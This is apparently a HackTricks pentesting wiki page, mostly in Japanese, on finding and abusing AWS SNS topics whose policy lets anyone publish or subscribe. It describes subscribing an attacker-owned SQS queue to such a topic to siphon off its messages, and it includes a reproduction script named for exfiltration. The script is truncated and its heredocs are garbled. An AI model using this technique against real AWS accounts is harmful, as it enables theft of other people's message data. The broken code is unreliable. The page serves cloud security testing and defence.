# AWS - SNS 未認証の列挙
{{#include ../../../../banners/hacktricks-training.md}}
## SNS
For more information about SNS check:
{{#ref}}
../../aws-services/aws-sns-enum.md
{{#endref}}
### 全員に公開
Web コンソールから SNS トピックを設定する際、トピックに対して **Everyone can publish and subscribe** と指定することができます:
.png)
したがって、アカウント内のトピックの **ARN を見つける**(またはトピック名を brute forcing して見つける)ことができれば、それらに対して **publish** または **subscribe** できるかを **確認** できます。
これは、SNS トピックのリソースポリシーが `sns:Subscribe` を `*`(または外部アカウント)に許可しているのと同等です。任意の principal は、今後のすべてのトピックメッセージを自身が所有する SQS キューに配信するサブスクリプションを作成できます。キューの所有者がサブスクリプションを開始した場合、SQS エンドポイントに対して人間の確認は不要です。
再現 (us-east-1)
```bash
REGION=us-east-1
# Victim account (topic owner)
VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)
# Open the topic to anyone subscribing
cat > /tmp/topic-policy.json < /tmp/sqs-policy.json <
{{#include ../../../../banners/hacktricks-training.md}}